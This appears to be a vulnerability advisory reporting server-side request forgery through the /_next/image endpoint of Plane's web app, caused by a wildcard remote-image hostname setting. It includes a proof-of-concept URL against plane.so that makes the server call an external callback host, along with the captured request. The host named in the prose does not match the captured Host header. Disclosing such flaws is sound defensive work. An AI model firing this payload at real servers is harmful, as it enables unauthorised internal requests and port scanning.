Server side request forgery via /_next/image endpoint

Summary

I noticed the use of ** wildcard support to retrieve the image from any hostname as in /web/next.config.js#L31.

  images: {
    remotePatterns: [
      {
        protocol: "https",
        hostname: "**",
      },
    ],

PoC

This may permit an attacker to induce the server side into performing requests to unintended location like in :

https://plane.so/_next/image?url=https%3A%2F%2F3dj9lr9c.c5.rs%2F%3F%23_next%2Fstatic%2Fmedia%2Fplane-logo-with-text.31443952.png&w=384&q=75

This payload would induce the server side to issue a GET request to ggh4j3ko.c5.rs

which may results into

GET / HTTP/1.0
User-Agent: imgix/3.0.0.0
Host: 3dj9lr9c.c5.rs
Accept-Encoding: gzip, deflate, br
Traceparent: 00-9eb3aa5e9a29201e79c5cbfd5178ecc1-c46fe33d08d44ae1-00
X-Imgix-Hops: 1
Accept: */*
Connection: close

Impact

A similar impact as in GHSA-j77v-w36v-63v6 , with port scanning possible.

Reference

https://www.assetnote.io/resources/research/digging-for-ssrf-in-nextjs-apps

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Server side request forgery via /_next/image endpoint

Package

Affected versions

Patched versions

Description

Summary

PoC

Impact

Reference

Severity

CVSS overall score

CVSS v3 base metrics

CVSS v3 base metrics

CVE ID

Weaknesses

Credits